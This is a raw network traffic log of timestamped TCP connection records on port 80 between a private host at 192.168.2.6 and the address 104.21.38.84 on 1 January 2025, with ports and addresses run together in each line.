                                                                                                                  Jan 1, 2025 16:03:34.124664068 CET8062749104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:34.172862053 CET6274980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:34.248779058 CET6274980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:34.249515057 CET6275080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:34.253796101 CET8062749104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:34.253896952 CET6274980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:34.254374027 CET8062750104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:34.254450083 CET6275080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.307310104 CET8062765104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:45.360382080 CET6276580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.482405901 CET8062765104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:45.532258034 CET6276580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.618313074 CET6276580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.618340969 CET6276480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.619128942 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.623641014 CET8062765104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:45.623688936 CET6276580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.623925924 CET8062766104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:45.623985052 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.624072075 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.628823996 CET8062766104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:45.969851017 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:45.974843979 CET8062766104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.070389986 CET8062766104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.126022100 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.335175991 CET8062766104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.391889095 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.467365980 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.467366934 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.472174883 CET8062767104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.472507000 CET8062766104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.474373102 CET6276680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.474436998 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.474622965 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.479355097 CET8062767104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.829307079 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:46.834259987 CET8062767104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.921832085 CET8062767104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:46.969791889 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.184758902 CET8062767104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.235486031 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.315105915 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.315992117 CET6276880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.320275068 CET8062767104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.320319891 CET6276780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.320827007 CET8062768104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.320894003 CET6276880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.321032047 CET6276880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.325750113 CET8062768104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.392441034 CET6276880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.394068956 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.398931980 CET8062769104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.398992062 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.399132967 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.403913975 CET8062769104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.438735008 CET8062768104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.519349098 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.524192095 CET8062770104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.524252892 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.524353981 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.529092073 CET8062770104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.675957918 CET8062768104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.676016092 CET6276880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.751359940 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.756190062 CET8062769104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.756354094 CET8062769104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.863580942 CET8062769104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.876281023 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.881109953 CET8062770104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:47.907289982 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:47.967863083 CET8062770104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.016673088 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.120013952 CET8062769104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.172904015 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.236311913 CET8062770104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.282284975 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.358587027 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.358591080 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.359519958 CET6277180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.363852024 CET8062770104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.363922119 CET6277080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.364334106 CET8062771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.364347935 CET8062769104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.364419937 CET6276980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.364430904 CET6277180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.364568949 CET6277180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.369342089 CET8062771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.721343994 CET6277180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.726330042 CET8062771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.828754902 CET8062771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:48.878325939 CET6277180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:48.998639107 CET8062771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.047938108 CET6277180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.124548912 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.129404068 CET8062772104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.129601002 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.129776001 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.134531021 CET8062772104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.485686064 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.490565062 CET8062772104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.582719088 CET8062772104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.626045942 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.755647898 CET8062772104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.797944069 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.877613068 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.878557920 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.882708073 CET8062772104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.882755995 CET6277280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.883414984 CET8062773104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:49.883480072 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.883611917 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:49.888329029 CET8062773104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:50.235635042 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.240454912 CET8062773104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:50.346214056 CET8062773104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:50.392257929 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.600403070 CET8062773104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:50.641700029 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.751173973 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.752337933 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.756198883 CET8062773104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:50.756282091 CET6277380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.757175922 CET8062774104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:50.757266998 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.757451057 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:50.762216091 CET8062774104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:51.112605095 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.117455006 CET8062774104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:51.208331108 CET8062774104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:51.266678095 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.479232073 CET8062774104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:51.481601000 CET6277180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.532319069 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.611418009 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.612369061 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.616344929 CET8062774104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:51.616399050 CET6277480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.617247105 CET8062775104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:51.617309093 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.617417097 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.622158051 CET8062775104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:51.970428944 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:51.975286961 CET8062775104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:52.077397108 CET8062775104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:52.141755104 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.351999998 CET8062775104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:52.408411980 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.482330084 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.482367992 CET6277680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.489423037 CET8062776104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:52.489557028 CET8062775104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:52.493170977 CET6277580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.493185997 CET6277680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.493614912 CET6277680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.500514030 CET8062776104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:52.845575094 CET6277680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:52.850547075 CET8062776104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:52.946441889 CET8062776104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:53.001055956 CET6277680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:53.128165960 CET6277780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:53.128525972 CET6277680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:03:53.133399963 CET8062777104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:03:53.133502960 CET6277780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:03.903630018 CET6279280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:03.904577971 CET8062793104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:03.904639959 CET6279380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:03.904782057 CET6279380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:03.909564018 CET8062793104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.251555920 CET6279380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.256452084 CET8062793104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.368046999 CET8062793104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.424649000 CET6279380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.507822990 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.507829905 CET6279380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.513571978 CET8062794104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.513849974 CET8062793104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.513932943 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.513936043 CET6279380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.514121056 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.520008087 CET8062794104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.708441019 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.713368893 CET8062795104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.713490963 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.713680983 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.718425035 CET8062795104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.864532948 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:04.869463921 CET8062794104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.869566917 CET8062794104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:04.956281900 CET8062794104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.048023939 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.064768076 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.069837093 CET8062795104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.131789923 CET8062794104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.169126034 CET8062795104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.220531940 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.252427101 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.430586100 CET8062795104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.485466957 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.548820019 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.549002886 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.549588919 CET6279680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.553904057 CET8062794104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.553988934 CET6279480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.554326057 CET8062795104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.554378986 CET6279580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.554410934 CET8062796104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.554495096 CET6279680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.554590940 CET6279680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.559391975 CET8062796104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:05.907525063 CET6279680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:05.912290096 CET8062796104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:06.008517027 CET8062796104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:06.063611031 CET6279680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:06.190157890 CET8062796104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:06.235507011 CET6279680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:06.312772989 CET6279780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:06.317640066 CET8062797104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:06.317730904 CET6279780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:06.320432901 CET6279780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:06.325253010 CET8062797104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:06.673333883 CET6279780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:06.678221941 CET8062797104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:06.763055086 CET8062797104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:06.940469027 CET6279780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.030220032 CET8062797104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:07.154159069 CET6279780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.154886007 CET6279880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.159493923 CET8062797104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:07.159626007 CET6279780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.160099030 CET8062798104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:07.160245895 CET6279880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.160423994 CET6279880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.165431023 CET8062798104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:07.517143965 CET6279880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.522007942 CET8062798104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:07.601274014 CET8062798104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:07.641735077 CET6279880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.870299101 CET8062798104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:07.995867968 CET6279880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:07.996390104 CET6279980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.000909090 CET8062798104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.000977039 CET6279880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.001171112 CET8062799104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.001231909 CET6279980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.001322031 CET6279980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.006314993 CET8062799104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.362473965 CET6279980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.367383003 CET8062799104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.445635080 CET8062799104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.631825924 CET8062799104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.634525061 CET6279980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.754430056 CET6279980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.758410931 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.760277033 CET8062799104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.760418892 CET6279980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.763237000 CET8062800104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:08.763489962 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.763489962 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:08.768274069 CET8062800104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.110716105 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.115641117 CET8062800104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.235918045 CET8062800104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.352015972 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.409555912 CET8062800104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.453043938 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.529694080 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.530206919 CET6280180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.534883976 CET8062800104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.534936905 CET6280080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.535063982 CET8062801104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.535139084 CET6280180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.535250902 CET6280180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.540019989 CET8062801104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.892364979 CET6280180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:09.897339106 CET8062801104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:09.999185085 CET8062801104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.143075943 CET6280180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.143742085 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.148286104 CET8062801104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.148349047 CET6280180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.148509026 CET8062802104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.148632050 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.148729086 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.153470039 CET8062802104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.265522957 CET6280380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.270462990 CET8062803104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.270528078 CET6280380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.270627975 CET6280380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.275382042 CET8062803104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.501355886 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.506302118 CET8062802104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.506454945 CET8062802104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.602142096 CET8062802104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.626432896 CET6280380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.631345987 CET8062803104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.735882998 CET8062803104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.751142025 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.782409906 CET8062802104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:10.907396078 CET6280380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:10.954277039 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.013051033 CET8062803104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:11.137558937 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.137644053 CET6280380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.138859034 CET6280480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.142694950 CET8062802104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:11.143021107 CET8062803104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:11.143676043 CET8062804104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:11.143799067 CET6280280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.143800020 CET6280480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.143802881 CET6280380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.147222996 CET6280480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:11.152107954 CET8062804104.21.38.84192.168.2.6
